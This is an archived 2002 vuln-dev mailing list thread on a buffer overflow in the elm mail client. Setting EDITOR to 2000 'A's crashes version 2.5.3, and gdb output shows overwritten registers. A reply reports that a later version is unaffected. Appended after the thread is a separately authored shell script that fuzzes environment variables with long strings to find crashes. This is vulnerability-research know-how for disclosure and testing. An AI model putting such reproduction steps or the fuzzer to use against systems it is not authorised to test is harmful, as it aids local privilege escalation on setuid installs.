Vulnerability Development mailing list archives

Re: elm bug ver 2.5.3 maybe others. (not suid on linux but suid on other OS.)


From: "SecurITeam BugTraq Monitoring" <bugtraq () securiteam com>
Date: Mon, 25 Feb 2002 12:13:18 +0200

Hi,

Elm 2.5 PL6, of August 7, 2001, isn't affected, as you can see:
# export EDITOR=`perl -e 'print "A" x 2000;'`

# elm

Notice:  ELM requires an ".elm" subdirectory off your home directory
to hold information such as your configuration preferences (the
"elmrc" file) and aliases.

May I create this directory for you (yes/no/quit) ? [y] : n
Very well, but you may run into difficulties later.

Nothing happens.

I don't think my version is old enough to manifest this vulnerability.

Thanks
Noam Rathaus
http://www.SecurITeam.com
http://www.BeyondSecurity.com

----- Original Message -----
From: "Ehud Tenenbaum" <analyzer () 2xss com>
To: <vuln-dev () securityfocus com>
Sent: Sunday, February 24, 2002 08:45
Subject: elm bug ver 2.5.3 maybe others. (not suid on linux but suid on other OS.)


Hey,

The 2xs Security team found a new bug in elm. Although it is not suid
on Linux systems (Red Hat 6.2, Mandrake 8.0, Slackware 7.1), we
believe it is suid on other kinds of *nix OS such as HP-UX.

w00p@Analyzer:/tmp/w00p/elm2.5.3/bin$ id
uid=100(w00p) gid=100(users) groups=100(users)
w00p@Analyzer:/tmp/w00p/elm2.5.3/bin$

w00p@Analyzer:/tmp/w00p/elm2.5.3/bin$ export EDITOR=`perl -e 'print "A" x 2000;'`
w00p@Analyzer:/tmp/w00p/elm2.5.3/bin$ elm

Notice:  ELM requires an ".elm" subdirectory off your home directory
to hold information such as your configuration preferences (the
"elmrc" file) and aliases.

May I create this directory for you (yes/no/quit) ? [y] : n
Segmentation fault
w00p@Analyzer:/tmp/w00p/elm2.5.3/bin$

w00p@Analyzer:/tmp/w00p/elm2.5.3/bin$ gdb ./elm
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-slackware-linux"...
(gdb) r
Starting program: /tmp/w00p/elm2.5.3/bin/./elm
warning: Unable to find dynamic linker breakpoint function.
GDB will be unable to debug shared library initializers
and track explicitly loaded dynamic code.

Notice:  ELM requires an ".elm" subdirectory off your home directory
to hold information such as your configuration preferences (the
"elmrc" file) and aliases.

May I create this directory for you (yes/no/quit) ? [y] : n

Program received signal SIGSEGV, Segmentation fault.
0x40074486 in catgets () from /lib/libc.so.6
(gdb) where
#0  0x40074486 in catgets () from /lib/libc.so.6
#1  0x805b6a6 in create_private_dir ()
#2  0x805b3fc in initialize ()
#3  0x80520bd in main ()
#4  0x4006faa7 in __libc_start_main () from /lib/libc.so.6
(gdb) info registers
eax            0x41414141       1094795585
ecx            0x40014000       1073823744
edx            0x0      0
ebx            0x4013bed4       1075035860
esp            0xbfffeca0       0xbfffeca0
ebp            0xbfffecb4       0xbfffecb4
esi            0x41414141       1094795585
edi            0xbffff264       -1073745308
eip            0x40074486       0x40074486
eflags         0x10202  66050
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x0      0
fctrl          0x37f    895
fstat          0x0      0
ftag           0xffff   65535
fiseg          0x0      0
fioff          0x0      0
foseg          0x0      0
fooff          0xbffff8a4       -1073743708
fop            0x0      0
(gdb)

The bug was found with BOS, the Binary Overflow Scanner tool made
by the 2xs Security team.

At this point we shall not release an exploit.
For Questions or Comments:

Ehud Tenenbaum <analyzer () 2xss com> CTO & Project manager.
Izik Kotler <izik () 2xss com> Senior programmer.
Mixter <mixter () 2xss com> Senior programmer.
acz <acz () 2xss com> QA/Programmer.

--
------------
Ehud Tenenbaum
C.T.O & Project Manager
2xs LTD.
Tel: 972-9-9519980
Fax: 972-9-9519982
E-Mail: ehud () 2xss com
------------
                                 Have A Safe Day
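The reproduction in the message above (set EDITOR to 2000 'A's, run elm, answer the ".elm" prompt with "n", watch for a segmentation fault) generalises to a small probe that tries several environment variables at several payload lengths and classifies each run by the target's exit status, so that a crash under one variable/length combination stands out from a clean exit. This is an added example, not code from either message and not 2xs's BOS tool; the function names, the default LENGTHS list and the variable names tried are my own choices, and it assumes a POSIX sh with awk and env on the PATH. The target is given as a command string and run through `sh -c`, with "n" fed on stdin as in the post; a program that insists on a real terminal may need to be wrapped in a pty tool such as script(1) instead.

```shell
#!/bin/sh
# Environment-variable overflow probe (hypothetical added example, not 2xs's BOS).
# For each variable name and payload length, runs the target with that variable
# set to a run of 'A's and reports whether the process exited normally or died
# from a signal (exit status 128+N, e.g. 139 = SIGSEGV on Linux).

# Payload lengths to try; override with LENGTHS="..." in the environment.
LENGTHS="${LENGTHS:-256 1024 2000 4096}"

# make_payload N: print N copies of 'A' with no trailing newline.
make_payload() {
    awk -v n="$1" 'BEGIN { while (i++ < n) printf "A" }'
}

# classify_status STATUS: print "crash:<signal>" for 128+N, else "exit:<code>".
classify_status() {
    if [ "$1" -gt 128 ]; then
        echo "crash:$(( $1 - 128 ))"
    else
        echo "exit:$1"
    fi
}

# probe_one TARGET_CMD VAR LEN: run the target once with VAR set to LEN 'A's,
# answering any prompt with "n" on stdin, and print the classified outcome.
# Always returns 0 so it can be used under set -e.
probe_one() {
    target=$1
    var=$2
    len=$3
    payload=$(make_payload "$len")
    status=0
    # env(1) exports only this one variable into the child; sh -c lets the
    # target be a command string rather than a single executable path.
    printf 'n\n' | env "$var=$payload" sh -c "$target" >/dev/null 2>&1 || status=$?
    classify_status "$status"
    return 0
}

# probe_target TARGET_CMD VAR...: try every variable at every length in LENGTHS
# and print one line per run.
probe_target() {
    target=$1
    shift
    for var in "$@"; do
        for len in $LENGTHS; do
            printf '%s len=%s -> %s\n' "$var" "$len" "$(probe_one "$target" "$var" "$len")"
        done
    done
    return 0
}

# Usage: ./envprobe.sh 'elm' EDITOR VISUAL PAGER MAIL HOME
if [ $# -ge 2 ]; then
    probe_target "$@"
fi
```

Read the output for any `crash:` line; the variable and length that produced it are the starting point for the gdb session shown in the post (set that variable in the shell, then `gdb ./elm` and `r`).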